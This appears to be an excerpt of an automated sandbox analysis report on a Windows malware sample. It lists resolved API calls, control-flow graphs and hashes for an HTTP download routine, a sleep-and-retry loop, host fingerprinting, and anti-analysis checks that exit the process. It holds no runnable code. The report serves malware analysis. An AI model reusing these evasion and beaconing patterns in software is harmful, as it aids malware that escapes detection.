                                  • GetProcAddress.KERNEL32(6FD30000,01CAC138), ref: 00E5A160
                                  • GetProcAddress.KERNEL32(6FD30000,01CA6440), ref: 00E5A179
                                  • GetProcAddress.KERNEL32(6FD30000,01CAC228), ref: 00E5A191
                                  • GetProcAddress.KERNEL32(6FD30000,01CBD938), ref: 00E5A1A9
                                  • GetProcAddress.KERNEL32(6FD30000,01CBDAE8), ref: 00E5A1C2
                                  • GetProcAddress.KERNEL32(6FD30000,01CA6600), ref: 00E5A1DA
                                  • GetProcAddress.KERNEL32(6FD30000,01CA6580), ref: 00E5A1F2
                                  • GetProcAddress.KERNEL32(6FD30000,01CBDB18), ref: 00E5A20B
                                  • GetProcAddress.KERNEL32(763B0000,01CA6320), ref: 00E5A22C
                                  • GetProcAddress.KERNEL32(763B0000,01CA63C0), ref: 00E5A244
                                  • GetProcAddress.KERNEL32(763B0000,01CBD9B0), ref: 00E5A25D
                                  • GetProcAddress.KERNEL32(763B0000,01CBD998), ref: 00E5A275
                                  • GetProcAddress.KERNEL32(763B0000,01CA6620), ref: 00E5A28D
                                  • GetProcAddress.KERNEL32(750F0000,01CABFA8), ref: 00E5A2B3
                                  • GetProcAddress.KERNEL32(750F0000,01CABDC8), ref: 00E5A2CB
                                  • GetProcAddress.KERNEL32(750F0000,01CBD9C8), ref: 00E5A2E3
                                  • GetProcAddress.KERNEL32(750F0000,01CA6540), ref: 00E5A2FC
                                  • GetProcAddress.KERNEL32(750F0000,01CA6640), ref: 00E5A314
                                  • GetProcAddress.KERNEL32(750F0000,01CABE90), ref: 00E5A32C
                                  • GetProcAddress.KERNEL32(75A50000,01CBDA70), ref: 00E5A352
                                  • GetProcAddress.KERNEL32(75A50000,01CA65C0), ref: 00E5A36A
                                  • GetProcAddress.KERNEL32(75A50000,01CB9A20), ref: 00E5A382
                                  • GetProcAddress.KERNEL32(75A50000,01CBDB90), ref: 00E5A39B
                                  • GetProcAddress.KERNEL32(75A50000,01CBDA88), ref: 00E5A3B3
                                  • GetProcAddress.KERNEL32(75A50000,01CA6380), ref: 00E5A3CB
                                  • GetProcAddress.KERNEL32(75A50000,01CA63A0), ref: 00E5A3E4
                                  • GetProcAddress.KERNEL32(75A50000,01CBDB60), ref: 00E5A3FC
                                  • GetProcAddress.KERNEL32(75A50000,01CBDAA0), ref: 00E5A414
                                  • GetProcAddress.KERNEL32(75070000,01CA62C0), ref: 00E5A436
                                  • GetProcAddress.KERNEL32(75070000,01CBDAD0), ref: 00E5A44E
                                  • GetProcAddress.KERNEL32(75070000,01CBDAB8), ref: 00E5A466
                                  • GetProcAddress.KERNEL32(75070000,01CBD950), ref: 00E5A47F
                                  • GetProcAddress.KERNEL32(75070000,01CBDBA8), ref: 00E5A497
                                  • GetProcAddress.KERNEL32(74E50000,01CA64E0), ref: 00E5A4B8
                                  • GetProcAddress.KERNEL32(74E50000,01CA6660), ref: 00E5A4D1
                                  • GetProcAddress.KERNEL32(75320000,01CA6280), ref: 00E5A4F2
                                  • GetProcAddress.KERNEL32(75320000,01CBD9F8), ref: 00E5A50A
                                  • GetProcAddress.KERNEL32(6F060000,01CA64A0), ref: 00E5A530
                                  • GetProcAddress.KERNEL32(6F060000,01CA6340), ref: 00E5A548
                                  • GetProcAddress.KERNEL32(6F060000,01CA63E0), ref: 00E5A560
                                  • GetProcAddress.KERNEL32(6F060000,01CBDBC0), ref: 00E5A579
                                  • GetProcAddress.KERNEL32(6F060000,01CA6400), ref: 00E5A591
                                  • GetProcAddress.KERNEL32(6F060000,01CA6420), ref: 00E5A5A9
                                  • GetProcAddress.KERNEL32(6F060000,01CA62A0), ref: 00E5A5C2
                                  • GetProcAddress.KERNEL32(6F060000,01CA62E0), ref: 00E5A5DA
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00E5A5F1
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00E5A607
                                  • GetProcAddress.KERNEL32(74E00000,01CBDB30), ref: 00E5A629
                                  • GetProcAddress.KERNEL32(74E00000,01CB9990), ref: 00E5A641
                                  • GetProcAddress.KERNEL32(74E00000,01CBDA10), ref: 00E5A659
                                  • GetProcAddress.KERNEL32(74E00000,01CBDA28), ref: 00E5A672
                                  • GetProcAddress.KERNEL32(74DF0000,01CA6300), ref: 00E5A693
                                  • GetProcAddress.KERNEL32(6F9A0000,01CBDB00), ref: 00E5A6B4
                                  • GetProcAddress.KERNEL32(6F9A0000,01CA6360), ref: 00E5A6CD
                                  • GetProcAddress.KERNEL32(6F9A0000,01CBDB48), ref: 00E5A6E5
                                  • GetProcAddress.KERNEL32(6F9A0000,01CBDBD8), ref: 00E5A6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 58e7d725d72038898e7f433bb788cd1d40b76f2be21ee535220ec9a814ded32c
                                  • Instruction ID: 3e2e1c7ffbc899bef7c95868e77c1d93282bb25e2445b5eed3b8a6df5fc63a13
                                  • Opcode Fuzzy Hash: 58e7d725d72038898e7f433bb788cd1d40b76f2be21ee535220ec9a814ded32c
                                  • Instruction Fuzzy Hash: 1E622DB5718200EFD764EFA8E98895E37F9F78C601314855BA6C6C3A4CD63F9452EB20
                                  Function 00E46280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 e46280-e4630b call e5a7a0 call e447b0 call e5a740 InternetOpenA StrCmpCA 1040 e46314-e46318 1033->1040 1041 e4630d 1033->1041 1042 e4631e-e46342 InternetConnectA 1040->1042 1043 e46509-e46525 call e5a7a0 call e5a800 * 2 1040->1043 1041->1040 1045 e464ff-e46503 InternetCloseHandle 1042->1045 1046 e46348-e4634c 1042->1046 1062 e46528-e4652d 1043->1062 1045->1043 1048 e4634e-e46358 1046->1048 1049 e4635a 1046->1049 1050 e46364-e46392 HttpOpenRequestA 1048->1050 1049->1050 1052 e464f5-e464f9 InternetCloseHandle 1050->1052 1053 e46398-e4639c 1050->1053 1052->1045 1055 e463c5-e46405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 e4639e-e463bf InternetSetOptionA 1053->1056 1058 e46407-e46427 call e5a740 call e5a800 * 2 1055->1058 1059 e4642c-e4644b call e58940 1055->1059 1056->1055 1058->1062 1067 e4644d-e46454 1059->1067 1068 e464c9-e464e9 call e5a740 call e5a800 * 2 1059->1068 1071 e46456-e46480 InternetReadFile 1067->1071 1072 e464c7-e464ef InternetCloseHandle 1067->1072 1068->1062 1073 e46482-e46489 1071->1073 1074 e4648b 1071->1074 1072->1052 1073->1074 1078 e4648d-e464c5 call e5a9b0 call e5a8a0 call e5a800 1073->1078 1074->1072 1078->1071
                                  APIs
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44839
                                    • Part of subcall function 00E447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44849
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • InternetOpenA.WININET(00E60DFE,00000001,00000000,00000000,00000000), ref: 00E462E1
                                  • StrCmpCA.SHLWAPI(?,01CBF318), ref: 00E46303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,01CBE7B0,00000000,00000000,00400100,00000000), ref: 00E46385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E463BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E463D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E463FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E4646D
                                  • InternetCloseHandle.WININET(00000000), ref: 00E464EF
                                  • InternetCloseHandle.WININET(00000000), ref: 00E464F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00E46503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: a937796c915a537dc136caadfefb11240414f80800a2ebebf6f0da71441fbb8e
                                  • Instruction ID: a0b56238377033778539cb9919bf396b657db83c3ad51433521c7aab08f365fb
                                  • Opcode Fuzzy Hash: a937796c915a537dc136caadfefb11240414f80800a2ebebf6f0da71441fbb8e
                                  • Instruction Fuzzy Hash: 7571AF71A00218EBDF24DFA0DC49BEE77B4BB44700F1095A9F50A7B184DBB56A89CF52
                                  Function 00E55510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 e55510-e55577 call e55ad0 call e5a820 * 3 call e5a740 * 4 1106 e5557c-e55583 1090->1106 1107 e55585-e555b6 call e5a820 call e5a7a0 call e41590 call e551f0 1106->1107 1108 e555d7-e5564c call e5a740 * 2 call e41590 call e552c0 call e5a8a0 call e5a800 call e5aad0 StrCmpCA 1106->1108 1124 e555bb-e555d2 call e5a8a0 call e5a800 1107->1124 1134 e55693-e556a9 call e5aad0 StrCmpCA 1108->1134 1138 e5564e-e5568e call e5a7a0 call e41590 call e551f0 call e5a8a0 call e5a800 1108->1138 1124->1134 1139 e557dc-e55844 call e5a8a0 call e5a820 * 2 call e41670 call e5a800 * 4 call e56560 call e41550 1134->1139 1140 e556af-e556b6 1134->1140 1138->1134 1270 e55ac3-e55ac6 1139->1270 1143 e556bc-e556c3 1140->1143 1144 e557da-e5585f call e5aad0 StrCmpCA 1140->1144 1148 e556c5-e55719 call e5a820 call e5a7a0 call e41590 call e551f0 call e5a8a0 call e5a800 1143->1148 1149 e5571e-e55793 call e5a740 * 2 call e41590 call e552c0 call e5a8a0 call e5a800 call e5aad0 StrCmpCA 1143->1149 1163 e55865-e5586c 1144->1163 1164 e55991-e559f9 call e5a8a0 call e5a820 * 2 call e41670 call e5a800 * 4 call e56560 call e41550 1144->1164 1148->1144 1149->1144 1249 e55795-e557d5 call e5a7a0 call e41590 call e551f0 call e5a8a0 call e5a800 1149->1249 1170 e55872-e55879 1163->1170 1171 e5598f-e55a14 call e5aad0 StrCmpCA 1163->1171 1164->1270 1179 e558d3-e55948 call e5a740 * 2 call e41590 call e552c0 call e5a8a0 call e5a800 call e5aad0 StrCmpCA 1170->1179 1180 e5587b-e558ce call e5a820 call e5a7a0 call e41590 call e551f0 call e5a8a0 call e5a800 1170->1180 1200 e55a16-e55a21 Sleep 1171->1200 1201 e55a28-e55a91 call e5a8a0 call e5a820 * 2 call e41670 call e5a800 * 4 call e56560 call e41550 1171->1201 1179->1171 1275 e5594a-e5598a call e5a7a0 call e41590 call e551f0 call e5a8a0 call e5a800 1179->1275 1180->1171 1200->1106 1201->1270 1249->1144 1275->1171
                                  APIs
                                    • Part of subcall function 00E5A820: lstrlen.KERNEL32(00E44F05,?,?,00E44F05,00E60DDE), ref: 00E5A82B
                                    • Part of subcall function 00E5A820: lstrcpy.KERNEL32(00E60DDE,00000000), ref: 00E5A885
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E556A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55857
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55228
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55318
                                    • Part of subcall function 00E552C0: lstrlen.KERNEL32(00000000), ref: 00E5532F
                                    • Part of subcall function 00E552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00E55364
                                    • Part of subcall function 00E552C0: lstrlen.KERNEL32(00000000), ref: 00E55383
                                    • Part of subcall function 00E552C0: lstrlen.KERNEL32(00000000), ref: 00E553AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E5578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E55940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00E55A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: 1c2f5b4c0375ed2c49323a8c9ed67aa75770befaeb4b6b3cf71b06984ee7ac60
                                  • Instruction ID: 7d3ca2a044569592e22b391c0f5ca8f99367da24f842b2de022bd8332e5dc851
                                  • Opcode Fuzzy Hash: 1c2f5b4c0375ed2c49323a8c9ed67aa75770befaeb4b6b3cf71b06984ee7ac60
                                  • Instruction Fuzzy Hash: C3E176729101049ACB18FBB0EC56AED73B8AF54301F449A79B94773485EF346B4DCBA2
                                  Function 00E517A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1301 e517a0-e517cd call e5aad0 StrCmpCA 1304 e517d7-e517f1 call e5aad0 1301->1304 1305 e517cf-e517d1 ExitProcess 1301->1305 1309 e517f4-e517f8 1304->1309 1310 e519c2-e519cd call e5a800 1309->1310 1311 e517fe-e51811 1309->1311 1313 e51817-e5181a 1311->1313 1314 e5199e-e519bd 1311->1314 1316 e51821-e51830 call e5a820 1313->1316 1317 e518ad-e518be StrCmpCA 1313->1317 1318 e518cf-e518e0 StrCmpCA 1313->1318 1319 e5198f-e51999 call e5a820 1313->1319 1320 e51849-e51858 call e5a820 1313->1320 1321 e51835-e51844 call e5a820 1313->1321 1322 e518f1-e51902 StrCmpCA 1313->1322 1323 e51951-e51962 StrCmpCA 1313->1323 1324 e51970-e51981 StrCmpCA 1313->1324 1325 e51913-e51924 StrCmpCA 1313->1325 1326 e51932-e51943 StrCmpCA 1313->1326 1327 e5185d-e5186e StrCmpCA 1313->1327 1328 e5187f-e51890 StrCmpCA 1313->1328 1314->1309 1316->1314 1333 e518c0-e518c3 1317->1333 1334 e518ca 1317->1334 1335 e518e2-e518e5 1318->1335 1336 e518ec 1318->1336 1319->1314 1320->1314 1321->1314 1337 e51904-e51907 1322->1337 1338 e5190e 1322->1338 1343 e51964-e51967 1323->1343 1344 e5196e 1323->1344 1346 e51983-e51986 1324->1346 1347 e5198d 1324->1347 1339 e51926-e51929 1325->1339 1340 e51930 1325->1340 1341 e51945-e51948 1326->1341 1342 e5194f 1326->1342 1329 e51870-e51873 1327->1329 1330 e5187a 1327->1330 1331 e51892-e5189c 1328->1331 1332 e5189e-e518a1 1328->1332 1329->1330 1330->1314 1352 e518a8 1331->1352 1332->1352 1333->1334 1334->1314 1335->1336 1336->1314 1337->1338 1338->1314 1339->1340 1340->1314 1341->1342 1342->1314 1343->1344 1344->1314 1346->1347 1347->1314 1352->1314
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00E517C5
                                  • ExitProcess.KERNEL32 ref: 00E517D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 04bdcd82b38b8b41e7e8af1208fe9b7e4de5049e663851923ef7c890dc190498
                                  • Instruction ID: ab4f082f1740f9f8927f88e7776d6a6b89d5b4c6fb09d56528ff975aaf08b2f3
                                  • Opcode Fuzzy Hash: 04bdcd82b38b8b41e7e8af1208fe9b7e4de5049e663851923ef7c890dc190498
                                  • Instruction Fuzzy Hash: 9E519BB4A04209EFCB04DFA0D954BBE77B5BF84306F10A989E842B7240D775E989CB61
                                  Function 00E57500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 e57500-e5754a GetWindowsDirectoryA 1357 e57553-e575c7 GetVolumeInformationA call e58d00 * 3 1356->1357 1358 e5754c 1356->1358 1365 e575d8-e575df 1357->1365 1358->1357 1366 e575e1-e575fa call e58d00 1365->1366 1367 e575fc-e57617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 e57619-e57626 call e5a740 1367->1369 1370 e57628-e57658 wsprintfA call e5a740 1367->1370 1377 e5767e-e5768e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E57542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E5757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E5760A
                                  • wsprintfA.USER32 ref: 00E57640
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\$
                                  • API String ID: 1544550907-3109660283
                                  • Opcode ID: 99c0d851941ef9955e0f77e33f46b47951dd8954858bf12242e87d4f34ac2105
                                  • Instruction ID: e2ce9b7fb1c3d19ae27bb11fe5ce97a14ca1aa5cd431cbd4fc31fbdb54550fff
                                  • Opcode Fuzzy Hash: 99c0d851941ef9955e0f77e33f46b47951dd8954858bf12242e87d4f34ac2105
                                  • Instruction Fuzzy Hash: 944194B1E04248EBDB10DF94DC45BDEBBB8EF08705F100599F94977280E779AA48CBA5
                                  Function 00E569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB14F8), ref: 00E598A1
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB1648), ref: 00E598BA
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB15B8), ref: 00E598D2
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB1528), ref: 00E598EA
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB1690), ref: 00E59903
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB9AD0), ref: 00E5991B
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CA66E0), ref: 00E59933
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CA6860), ref: 00E5994C
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB1678), ref: 00E59964
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB16A8), ref: 00E5997C
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB1738), ref: 00E59995
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB16C0), ref: 00E599AD
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CA6880), ref: 00E599C5
                                    • Part of subcall function 00E59860: GetProcAddress.KERNEL32(75900000,01CB16D8), ref: 00E599DE
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E411D0: ExitProcess.KERNEL32 ref: 00E41211
                                    • Part of subcall function 00E41160: GetSystemInfo.KERNEL32(?), ref: 00E4116A
                                    • Part of subcall function 00E41160: ExitProcess.KERNEL32 ref: 00E4117E
                                    • Part of subcall function 00E41110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E4112B
                                    • Part of subcall function 00E41110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E41132
                                    • Part of subcall function 00E41110: ExitProcess.KERNEL32 ref: 00E41143
                                    • Part of subcall function 00E41220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E4123E
                                    • Part of subcall function 00E41220: __aulldiv.LIBCMT ref: 00E41258
